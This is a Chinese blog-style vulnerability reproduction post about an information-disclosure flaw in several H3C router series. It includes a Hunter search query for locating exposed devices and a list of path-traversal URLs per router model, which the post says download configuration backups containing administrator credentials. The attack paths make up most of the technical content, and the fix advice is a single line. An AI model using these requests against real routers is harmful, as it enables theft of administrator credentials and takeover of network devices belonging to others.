【漏洞复现】H3C 路由器多系列信息泄露漏洞

Nx01 产品简介

H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。

Nx02 漏洞描述

H3C路由器多系列存在信息泄露漏洞,攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息。

Nx03 产品主页

hunter-query:app.name="H3C Router Management"

Nx04 漏洞复现

POC:

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
有梦想的骇客4 分钟前
http和https请求总结
网络·网络协议·http
Cloud孙文波10 分钟前
解决GPU 显存未能完全释放
linux·运维·服务器
大雨淅淅23 分钟前
【网络通信】计算机网络安全技术总结
网络·安全·web安全
鸽芷咕23 分钟前
『亚马逊云科技产品测评』程序员最值得拥有的第一台专属服务器 “亚马逊EC2实例“
linux·运维·服务器·科技·个人博客
“抚琴”的人38 分钟前
C#——反射详情
服务器·ui·c#
曲江涛1 小时前
【JS问题】require相对路径引入模块
linux·运维·服务器
打磨时间的针1 小时前
Websocket实现方式二——注解方式
网络·websocket·网络协议
半个西瓜.1 小时前
网络安全:渗透测试思路.(面试)
网络·安全·web安全·网络安全·面试·职场和发展
状元岐2 小时前
c#网络Tcp和udp
网络·tcp/ip·c#
nothing one2 小时前
使用 frida hook Android app
android·javascript·python·安全